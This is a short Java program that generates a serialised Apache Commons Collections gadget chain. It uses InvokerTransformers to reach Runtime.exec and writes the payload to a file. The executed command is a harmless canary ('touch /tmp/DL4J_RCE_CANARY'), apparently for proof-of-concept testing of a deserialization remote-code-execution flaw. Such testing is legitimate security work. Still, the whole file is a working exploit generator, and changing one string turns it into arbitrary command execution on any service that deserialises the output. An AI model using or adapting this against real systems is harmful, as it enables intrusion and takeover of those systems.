import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.*; import org.apache.commons.collections.map.LazyMap; import org.apache.commons.collections.keyvalue.TiedMapEntry; import java.io.*; import java.lang.reflect.*; import java.util.*; public class GadgetGen3 { public static void main(String[] a) throws Exception { String out=a[0]; String[] cmd={"touch","/tmp/DL4J_RCE_CANARY"}; Transformer[] t={ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class}, new Object[]{"getRuntime",new Class[0]}), new InvokerTransformer("invoke", new Class[]{Object.class,Object[].class}, new Object[]{null,new Object[0]}), new InvokerTransformer("exec", new Class[]{String[].class}, new Object[]{cmd}) }; Transformer chain=new ChainedTransformer(t); Map lazyMap=LazyMap.decorate(new HashMap(), new ConstantTransformer(1)); TiedMapEntry entry=new TiedMapEntry(lazyMap,"foo"); HashMap map=new HashMap<>(); map.put(entry,"bar"); lazyMap.remove("foo"); Field f=LazyMap.class.getDeclaredField("factory"); f.setAccessible(true); f.set(lazyMap, chain); ByteArrayOutputStream b=new ByteArrayOutputStream(); new ObjectOutputStream(b).writeObject(map); java.nio.file.Files.write(new File(out).toPath(), b.toByteArray()); System.out.println("cc3 gadget written ("+b.size()+" bytes)"); } }